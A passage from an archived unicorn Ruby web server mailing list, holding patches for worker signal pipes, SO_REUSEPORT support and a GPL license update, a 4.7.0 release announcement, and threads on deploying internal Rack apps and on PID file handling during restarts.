       exit!(77) # EX_NOPERM in sysexits.h
@@ -635,22 +636,24 @@ class Unicorn::HttpServer
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = master_pid
-    init_worker_process(worker)
+    readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
-    l = LISTENERS.dup
-    ready = l.dup
 
-    # closing anything we IO.select on will raise EBADF
-    trap(:USR1) { nr = -65536; SELF_PIPE[0].close rescue nil }
-    trap(:QUIT) { worker = nil; LISTENERS.each { |s| s.close rescue nil }.clear }
-    logger.info "worker=#{worker.nr} ready"
+    # this only works immediately if the master sent us the signal
+    # (which is the normal case)
+    trap(:USR1) { nr = -65536 }
+
+    ready = readers.dup
+    @logger.info "worker=#{worker.nr} ready"
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
-
       worker.tick = Time.now.to_i
-      while sock = ready.shift
+      tmp = ready.dup
+      while sock = tmp.shift
+        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # but that will return false
         if client = sock.kgio_tryaccept
           process_client(client)
           nr += 1
@@ -663,8 +666,8 @@ class Unicorn::HttpServer
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0 # (nr < 0) => reopen logs (unlikely)
-        ready = l.dup
+      unless nr == 0
+        tmp = ready.dup
         redo
       end
 
@@ -672,11 +675,11 @@ class Unicorn::HttpServer
 
       # timeout used so we can detect parent death:
       worker.tick = Time.now.to_i
-      ret = IO.select(l, nil, SELF_PIPE, @timeout) and ready = ret[0]
+      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
-      redo if nr < 0 && (Errno::EBADF === e || IOError === e) # reopen logs
-      Unicorn.log_error(@logger, "listen loop error", e) if worker
-    end while worker
+      redo if nr < 0
+      Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
+    end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
@@ -692,6 +695,10 @@ class Unicorn::HttpServer
     WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
   end
 
+  def soft_kill_each_worker(signal)
+    WORKERS.each_value { |worker| worker.soft_kill(signal) }
+  end
+
   # unlinks a PID file at given +path+ if it contains the current PID
   # still potentially racy without locking the directory (which is
   # non-portable and may interact badly with other programs), but the
@@ -720,7 +727,7 @@ class Unicorn::HttpServer
     config[:listeners].replace(@init_listeners)
     config.reload
     config.commit!(self)
-    kill_each_worker(:QUIT)
+    soft_kill_each_worker(:QUIT)
     Unicorn::Util.reopen_logs
     self.app = orig_app
     build_app! if preload_app
@@ -756,12 +763,6 @@ class Unicorn::HttpServer
     io.sync = true
   end
 
-  def init_self_pipe!
-    SELF_PIPE.each { |io| io.close rescue nil }
-    SELF_PIPE.replace(Kgio::Pipe.new)
-    SELF_PIPE.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
-  end
-
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 1fb6a4a..e74a1c9 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -12,6 +12,7 @@ class Unicorn::Worker
   # :stopdoc:
   attr_accessor :nr, :switched
   attr_writer :tmp
+  attr_reader :to_io # IO.select-compatible
 
   PER_DROP = Raindrops::PAGE_SIZE / Raindrops::SIZE
   DROPS = []
@@ -23,6 +24,66 @@ class Unicorn::Worker
     @raindrop[@offset] = 0
     @nr = nr
     @tmp = @switched = false
+    @to_io, @master = Unicorn.pipe
+  end
+
+  def atfork_child # :nodoc:
+    # we _must_ close in child, parent just holds this open to signal
+    @master = @master.close
+  end
+
+  # master fakes SIGQUIT using this
+  def quit # :nodoc:
+    @master = @master.close if @master
+  end
+
+  # parent does not read
+  def atfork_parent # :nodoc:
+    @to_io = @to_io.close
+  end
+
+  # call a signal handler immediately without triggering EINTR
+  # We do not use the more obvious Process.kill(sig, $$) here since
+  # that signal delivery may be deferred.  We want to avoid signal delivery
+  # while the Rack app.call is running because some database drivers
+  # (e.g. ruby-pg) may cancel pending requests.
+  def fake_sig(sig) # :nodoc:
+    old_cb = trap(sig, "IGNORE")
+    old_cb.call
+  ensure
+    trap(sig, old_cb)
+  end
+
+  # master sends fake signals to children
+  def soft_kill(sig) # :nodoc:
+    case sig
+    when Integer
+      signum = sig
+    else
+      signum = Signal.list[sig.to_s] or
+          raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
+    end
+    # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
+    # Do not care in the odd case the buffer is full, here.
+    @master.kgio_trywrite([signum].pack('l'))
+  rescue Errno::EPIPE
+    # worker will be reaped soon
+  end
+
+  # this only runs when the Rack app.call is not running
+  # act like a listener
+  def kgio_tryaccept # :nodoc:
+    case buf = @to_io.kgio_tryread(4)
+    when String
+      # unpack the buffer and trigger the signal handler
+      signum = buf.unpack('l')
+      fake_sig(signum[0])
+      # keep looping, more signals may be queued
+    when nil # EOF: master died, but we are at a safe place to exit
+      fake_sig(:QUIT)
+    when :wait_readable # keep waiting
+      return false
+    end while true # loop, as multiple signals may be sent
   end
 
   # worker objects may be compared to just plain Integers
@@ -49,8 +110,11 @@ class Unicorn::Worker
     end
   end
 
+  # called in both the master (reaping worker) and worker (SIGQUIT handler)
   def close # :nodoc:
     @tmp.close if @tmp
+    @master.close if @master
+    @to_io.close if @to_io
   end
 
   # :startdoc:
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 2%]

* Re: Best way to deploy an internal Rack app?
  2013-11-21 10:58  3% Best way to deploy an internal Rack app? Andrew Stewart
@ 2013-11-21 17:22  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-21 17:22 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> Hello!
> 
> I have a Rails monolith and have identified a few parts which can be
> chipped off and deployed as self-contained services, called by the
> monolith.
> 
> Each service will be a rack app presenting an API over HTTP.  For now
> everything will run on the same box.  The services shouldn't be
> exposed to the outside world.

> I have almost built the first service and am now wondering how best to serve it.  For example:
> 
> - Does Unicorn alone suffice or should I front it with Nginx?

This depends on how you want clients to connect.  Either the unicorns
need to listen on different addresses/ports, or you can set up nginx to
handle routing so clients only connect to nginx.

> - To keep the services internal do I just listen to a port on the
> loopback interface?

Any address:port (127.0.0.1:1234, 127.0.0.2:1234, ...), or unix socket.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Best way to deploy an internal Rack app?
@ 2013-11-21 10:58  3% Andrew Stewart
  2013-11-21 17:22  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andrew Stewart @ 2013-11-21 10:58 UTC (permalink / raw)
  To: unicorn list

Hello!

I have a Rails monolith and have identified a few parts which can be chipped off and deployed as self-contained services, called by the monolith.

Each service will be a rack app presenting an API over HTTP.  For now everything will run on the same box.  The services shouldn't be exposed to the outside world.

I have almost built the first service and am now wondering how best to serve it.  For example:

- Does Unicorn alone suffice or should I front it with Nginx?
- To keep the services internal do I just listen to a port on the loopback interface?

Thanks in advance,

Andrew Stewart

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* [ANN] unicorn 4.7.0 - minor updates, license tweak
@ 2013-11-04  7:57  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-04  7:57 UTC (permalink / raw)
  To: mongrel-unicorn

* git://bogomips.org/unicorn.git
* http://unicorn.bogomips.org/NEWS.atom.xml

Changes:

* support SO_REUSEPORT on new listeners (:reuseport)

This allows users to start an independent instance of unicorn on
a the same port as a running unicorn (as long as both instances
use :reuseport).

ref: https://lwn.net/Articles/542629/

* unicorn is now GPLv2-or-later and Ruby 1.8-licensed
(instead of GPLv2-only, GPLv3-only, and Ruby 1.8-licensed)

This changes nothing at the moment.  Once the FSF publishes the next
version of the GPL, users may choose the newer GPL version without the
unicorn BDFL approving it.  Two years ago when I got permission to add
GPLv3 to the license options, I also got permission from all past
contributors to approve future versions of the GPL.  So now I'm
approving all future versions of the GPL for use with unicorn.

Reasoning below:

In case the GPLv4 arrives and I am not alive to approve/review it,
the lesser of evils is have give blanket approval of all future GPL
versions (as published by the FSF).  The worse evil is to be stuck
with a license which cannot guarantee the Free-ness of this project
in the future.

This unfortunately means the FSF can theoretically come out with
license terms I do not agree with, but the GPLv2 and GPLv3 will
always be an option to all users.

Note: we currently prefer GPLv3

Two improvements thanks to Ernest W. Durbin III:

* USR2 redirects fixed for Ruby 1.8.6 (broken since 4.1.0)
* unicorn(1) and unicorn_rails(1) enforces valid integer for -p/--port

A few more odd, minor tweaks and fixes:

* attempt to rename PID file when possible (on USR2)
* workaround reopen atomicity issues for stdio vs non-stdio
* improve handling of client-triggerable socket errors

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* [PATCH] license: allow all future versions of the GNU GPL
@ 2013-10-26  7:58 10% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-26  7:58 UTC (permalink / raw)
  To: mongrel-unicorn

There is currently no GPLv4, so this change has no effect at the
moment.

In case the GPLv4 arrives and I am not alive to approve/review it,
the lesser of evils is have give blanket approval of all future GPL
versions (as published by the FSF).  The worse evil is to be stuck
with a license which cannot guarantee the Free-ness of this project
in the future.

This unfortunately means the FSF can theoretically come out with
license terms I do not agree with, but the GPLv2 and GPLv3 will
always be an option to all users.
---
 LICENSE                          | 17 ++++++++++-------
 README                           |  5 +++--
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn/app/inetd.rb         |  2 +-
 lib/unicorn/app/old_rails.rb     |  2 +-
 lib/unicorn/cgi_wrapper.rb       |  2 +-
 test/test_helper.rb              |  2 +-
 test/unit/test_http_parser.rb    |  2 +-
 test/unit/test_request.rb        |  2 +-
 test/unit/test_response.rb       |  2 +-
 test/unit/test_server.rb         |  2 +-
 test/unit/test_signals.rb        |  2 +-
 unicorn.gemspec                  |  2 +-
 13 files changed, 24 insertions(+), 20 deletions(-)

diff --git a/LICENSE b/LICENSE
index 099110a..5b6458e 100644
--- a/LICENSE
+++ b/LICENSE
@@ -3,15 +3,18 @@ revision control for names and email addresses of all of them.
 
 You can redistribute it and/or modify it under either the terms of the
 GNU General Public License (GPL) as published by the Free Software
-Foundation (FSF), version {3.0}[http://www.gnu.org/licenses/gpl-3.0.txt]
-or version {2.0}[http://www.gnu.org/licenses/gpl-2.0.txt]
-or the Ruby-specific license terms (see below).
+Foundation (FSF), either version 2 of the License, or (at your option)
+any later version.  We currently prefer the GPLv3 or later for
+derivative works, but the GPLv2 is fine.
 
-The unicorn project leader (Eric Wong) reserves the right to add future
-versions of the GPL (and no other licenses) as published by the FSF to
-the licensing terms.
+The complete texts of the GPLv2 and GPLv3 are below:
+GPLv2 - http://www.gnu.org/licenses/gpl-2.0.txt
+GPLv3 - http://www.gnu.org/licenses/gpl-3.0.txt
 
-=== Ruby-specific terms (if you're not using the GPLv2 or GPLv3)
+You may (against our _preference_) also use the Ruby 1.8 license terms
+which we inherited from the original Mongrel project when we forked it:
+
+=== Ruby 1.8-specific terms (if you're not using the GPL)
 
   1. You may make and give away verbatim copies of the source form of the
      software without restriction, provided that you duplicate all of the
diff --git a/README b/README
index 5dde0d7..42167c8 100644
--- a/README
+++ b/README
@@ -63,8 +63,9 @@ both the the request and response in between \Unicorn and slow clients.
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is tri-licensed under (your choice) of the GPLv3, GPLv2 or
-Ruby (1.8)-specific terms.  See the included LICENSE file for details.
+\Unicorn is licensed under (your choice) of the GPLv2 or later
+(GPLv3+ preferred), or Ruby (1.8)-specific terms.
+See the included LICENSE file for details.
 
 \Unicorn is 100% Free Software.
 
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 3529740..6293033 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -2,7 +2,7 @@
  * Copyright (c) 2009 Eric Wong (all bugs are Eric's fault)
  * Copyright (c) 2005 Zed A. Shaw
  * You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
- * the GPLv3
+ * the GPLv2+ (GPLv3+ preferred)
  */
 #include "ruby.h"
 #include "ext_help.h"
diff --git a/lib/unicorn/app/inetd.rb b/lib/unicorn/app/inetd.rb
index b851214..13b6624 100644
--- a/lib/unicorn/app/inetd.rb
+++ b/lib/unicorn/app/inetd.rb
@@ -2,7 +2,7 @@
 # :enddoc:
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 
 # this class *must* be used with Rack::Chunked
 module Unicorn::App
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index ad1ca8e..1e8c41a 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -5,7 +5,7 @@
 # Copyright (c) 2005 Zed A. Shaw
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 # Additional work donated by contributors.  See CONTRIBUTORS for more info.
 require 'unicorn/cgi_wrapper'
 require 'dispatcher'
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d0175d0..d9b7fe5 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -5,7 +5,7 @@
 # Copyright (c) 2005 Zed A. Shaw
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See CONTRIBUTORS for more info.
 
diff --git a/test/test_helper.rb b/test/test_helper.rb
index cf98996..c65f2f3 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
 # for more information.
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 64146e7..8d5b251 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
 # for more information.
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index a57cbcd..fbda1a2 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 
 require 'test/test_helper'
 
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 054c3dd..85ac085 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
 # for more information.
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index a821790..e5b335f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
 # for more information.
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index f1d8bb3..443c736 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Ensure we stay sane in the face of signals being sent to us
 
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 0453eb0..4619a89 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -40,5 +40,5 @@ Gem::Specification.new do |s|
   s.add_development_dependency('isolate', '~> 3.2')
   s.add_development_dependency('wrongdoc', '~> 1.6.1')
 
-  s.licenses = ["GPLv2", "GPLv3", "Ruby 1.8"]
+  s.licenses = ["GPLv2+", "Ruby 1.8"]
 end
-- 
1.8.4.483.g7fe67e6.dirty
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 10%]

* Re: [PATCH] support SO_REUSEPORT on new listeners (:reuseport)
  2013-10-25 20:34  7% [PATCH] support SO_REUSEPORT on new listeners (:reuseport) Eric Wong
@ 2013-10-25 20:49  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-25 20:49 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> This allows users to start an independent instance of unicorn on
> a the same port as a running unicorn (as long as both instances
> use :reuseport).
> 
> ref: https://lwn.net/Articles/542629/
> ---

Also pushed out a couple of trivial IO_PURGATORY-related fixes to
support this.  We'll drop 1.8 support one of these days.

commit e025cd99beee500f175a3bcc302a1307b39ffb77
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:45:15 2013 +0000

    avoid IO_PURGATORY on Ruby 1.9+
    
    Ruby 1.9 and later includes IO#autoclose=, so we can use it
    and prevent some dead IO objects from hanging around.

commit 7c125886b5862bf20711bae22e6697ad46141434
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:27:05 2013 +0000

    support SO_REUSEPORT on new listeners (:reuseport)
    
    This allows users to start an independent instance of unicorn on
    a the same port as a running unicorn (as long as both instances
    use :reuseport).
    
    ref: https://lwn.net/Articles/542629/

commit 1dc099228ee0f59c13385a3e7346a2cb37d85153
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:54:39 2013 +0000

    tests: limit oobgc check to accepted sockets
    
    Otherwise these tests fail if we start using IO#autoclose=true
    on Ruby 1.9 (and also if we use IPv6 sockets for tests).
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* [PATCH] support SO_REUSEPORT on new listeners (:reuseport)
@ 2013-10-25 20:34  7% Eric Wong
  2013-10-25 20:49  2% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-25 20:34 UTC (permalink / raw)
  To: mongrel-unicorn

This allows users to start an independent instance of unicorn on
a the same port as a running unicorn (as long as both instances
use :reuseport).

ref: https://lwn.net/Articles/542629/
---
 lib/unicorn/configurator.rb     | 19 +++++++++++++++++++
 lib/unicorn/socket_helper.rb    | 30 ++++++++++++++++++++++--------
 test/unit/test_socket_helper.rb |  8 ++++++++
 3 files changed, 49 insertions(+), 8 deletions(-)

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 0d0eac7..fc3405a 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -319,6 +319,25 @@ class Unicorn::Configurator
   #
   #   Default: Operating-system dependent
   #
+  # [:reuseport => true or false]
+  #
+  #   This enables multiple, independently-started unicorn instances to
+  #   bind to the same port (as long as all the processes enable this).
+  #
+  #   This option must be used when unicorn first binds the listen socket.
+  #   It cannot be enabled when a socket is inherited via SIGUSR2
+  #   (but it will remain on if inherited), and it cannot be enabled
+  #   directly via SIGHUP.
+  #
+  #   Note: there is a chance of connections being dropped if
+  #   one of the unicorn instances is stopped while using this.
+  #
+  #   This is supported on *BSD systems and Linux 3.9 or later.
+  #
+  #   ref: https://lwn.net/Articles/542629/
+  #
+  #   Default: false (unset)
+  #
   # [:tries => Integer]
   #
   #   Times to retry binding a socket if it is already in use
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 18b0be7..2701d58 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -41,6 +41,15 @@ module Unicorn
 
       # do not send out partial frames (Linux)
       TCP_CORK = 3 unless defined?(TCP_CORK)
+
+      # Linux got SO_REUSEPORT in 3.9, BSDs have had it for ages
+      unless defined?(SO_REUSEPORT)
+        if RUBY_PLATFORM =~ /(?:alpha|mips|parisc|sparc)/
+          SO_REUSEPORT = 0x0200 # untested
+        else
+          SO_REUSEPORT = 15 # only tested on x86_64 and i686
+        end
+      end
     when /freebsd/
       # do not send out partial frames (FreeBSD)
       TCP_NOPUSH = 4 unless defined?(TCP_NOPUSH)
@@ -142,9 +151,9 @@ module Unicorn
           File.umask(old_umask)
         end
       elsif /\A\[([a-fA-F0-9:]+)\]:(\d+)\z/ =~ address
-        new_ipv6_server($1, $2.to_i, opt)
+        new_tcp_server($1, $2.to_i, opt.merge(:ipv6=>true))
       elsif /\A(\d+\.\d+\.\d+\.\d+):(\d+)\z/ =~ address
-        Kgio::TCPServer.new($1, $2.to_i)
+        new_tcp_server($1, $2.to_i, opt)
       else
         raise ArgumentError, "Don't know how to bind: #{address}"
       end
@@ -152,13 +161,18 @@ module Unicorn
       sock
     end
 
-    def new_ipv6_server(addr, port, opt)
-      opt.key?(:ipv6only) or return Kgio::TCPServer.new(addr, port)
-      defined?(IPV6_V6ONLY) or
-        abort "Socket::IPV6_V6ONLY not defined, upgrade Ruby and/or your OS"
-      sock = Socket.new(AF_INET6, SOCK_STREAM, 0)
-      sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, opt[:ipv6only] ? 1 : 0)
+    def new_tcp_server(addr, port, opt)
+      # n.b. we set FD_CLOEXEC in the workers
+      sock = Socket.new(opt[:ipv6] ? AF_INET6 : AF_INET, SOCK_STREAM, 0)
+      if opt.key?(:ipv6only)
+        defined?(IPV6_V6ONLY) or
+          abort "Socket::IPV6_V6ONLY not defined, upgrade Ruby and/or your OS"
+        sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, opt[:ipv6only] ? 1 : 0)
+      end
       sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
+      if defined?(SO_REUSEPORT) && opt[:reuseport]
+        sock.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
+      end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
       IO_PURGATORY << sock
       Kgio::TCPServer.for_fd(sock.fileno)
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a38082c..abc177b 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -184,4 +184,12 @@ class TestSocketHelper < Test::Unit::TestCase
     assert_equal 1, cur
     rescue Errno::EAFNOSUPPORT
   end if RUBY_VERSION >= "1.9.2"
+
+  def test_reuseport
+    port = unused_port @test_addr
+    name = "#@test_addr:#{port}"
+    sock = bind_listen(name, :reuseport => true)
+    cur = sock.getsockopt(Socket::SOL_SOCKET, SO_REUSEPORT).unpack('i')[0]
+    assert_equal 1, cur
+  end if defined?(SO_REUSEPORT)
 end
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 7%]

* Re: pid file handling issue
  2013-10-24 18:21  3%         ` Eric Wong
@ 2013-10-24 19:57  0%           ` Michael Fischer
  0 siblings, 0 replies; 200+ results
From: Michael Fischer @ 2013-10-24 19:57 UTC (permalink / raw)
  To: unicorn list

On Thu, Oct 24, 2013 at 11:21 AM, Eric Wong <normalperson@yhbt.net> wrote:

> Right, we looked at using rename last year but I didn't think it's possible
> given we need to write the pid file before binding new listen sockets
>
>   http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net
>
> But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
> detected.  I'll see if that can be done w/o breaking compatibility.

My opinion is that supporting backward compatibility cases that are
clearly poorly designed, at least in open-source software, is
ill-advised.  (I'm referring to the Mongrel compatibility semantics
discussed in that article.)

That aside, I don't yet understand this "need" you're referring to.
The control flow I'm proposing is as follows:

(1) Previous-generation parent (P) receives SIGUSR2.
(2) P renames unicorn.pid to unicorn.oldpid
(3) P forks child (P'); if fork unsuccessful, P renames unicorn.oldpid
to unicorn.pid.
(4) P' calls exec and attempts to start; creates unicorn.pid. P
watches for SIGCHLD from P'.  If received, P renames unicorn.oldpid to
unicorn.pid.
(5) P' sends SIGQUIT to P.  P' unlinks unicorn.oldpid.  P' is now P.

What am I missing here?  This is, to my knowledge, precisely what
nginx does (http://wiki.nginx.org/CommandLine#Upgrading_To_a_New_Binary_On_The_Fly).

>> If the file's mtime or inode number changes under my proposal, that
>> means the reload must have been successful.   What race condition are
>> you referring to that would render this conclusion inaccurate?
>
> It doesn't mean the process didn't exit/crash right after writing the PID.

That should not happen per (4) above.

> But NTP syncs early in the boot process before most processes (including
> unicorn) are started.  It shouldn't matter, then, right?

Truth be told, I'm not completely certain why this is an issue.  My
reading of procps and the kernel suggests it should be doing the right
thing, but I tried this at first:

- Touch a timestamp file before sending P a SIGUSR2.
- Wait for oldpid to disappear
- Read the stime field from ps(1) for the remaining master process (P or P')
- If stime < mtime of timestamp: new process failed.  If stime >
mtime, new process succeeded.

But for reasons unclear to me, sometimes the stime of P' (successful
reload) would predate the timestamp!  This was obviously agonizing.

>> To reiterate, I'm not using the PID file in this instance to determine
>> Unicorn's PID.  It could be empty, for all I care.
>
> OK.  I assume you do the same for nginx?

With nginx we have -t; we can at least test the config file and have a
reasonable degree of certainty that it will reload properly.  With
Rack apps, not so much. :)

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  2013-10-24 17:51  0%       ` Michael Fischer
@ 2013-10-24 18:21  3%         ` Eric Wong
  2013-10-24 19:57  0%           ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24 18:21 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> >> > I read and stash the value of the pid file before issuing any USR2.
> >> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> >> > to ensure it's dead.
> >>
> >> That's inherently racy; another process can claim the old PID in the interim.
> >
> > Right, but raciness goes for anything regarding pid files.
> >
> > The OS does make an effort to avoid recycling PIDs too often,
> > and going through all the PIDs in a system quickly is
> > probably rare.  I haven't hit it, at least.
> 
> That's not good enough.
> 
> The fact that the pid file contains a pid is immaterial to me; I don't
> even need to look at it.  I only care about when it was created, or
> what its inode number is, so that I can detect whether Unicorn was
> last successfully started or restarted.  rename(2) is atomic per POSIX
> and is not subject to race conditions.

Right, we looked at using rename last year but I didn't think it's possible
given we need to write the pid file before binding new listen sockets

  http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net

But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
detected.  I'll see if that can be done w/o breaking compatibility.

> >> > Checking the mtime of the pidfile is really bizarre...
> >>
> >> Perhaps (though it's a normative criticism), but on the other hand, it
> >> isn't subject to the race above.
> >
> > It's still racy in a different way, though (file could change right
> > after checking).
> 
> If the file's mtime or inode number changes under my proposal, that
> means the reload must have been successful.   What race condition are
> you referring to that would render this conclusion inaccurate?

It doesn't mean the process didn't exit/crash right after writing the PID.

> > Having the process start time in /proc be unreliable because the server
> > has the wrong time is also in the same category of corner cases.
> 
> This is absolutely not true.  A significant minority, if not a
> majority, of servers will have at least slightly inaccurate wall
> clocks on boot.  This is usually corrected during boot by an NTP sync,
> but by then the die has already been cast insofar as ps(1) output is
> concerned.

But NTP syncs early in the boot process before most processes (including
unicorn) are started.  It shouldn't matter, then, right?

> > Also, can you check the inode of the /proc/$pid entry?  Perhaps
> 
> That's not portable.
> 
> > PID files are horrible, really :<
> 
> To reiterate, I'm not using the PID file in this instance to determine
> Unicorn's PID.  It could be empty, for all I care.

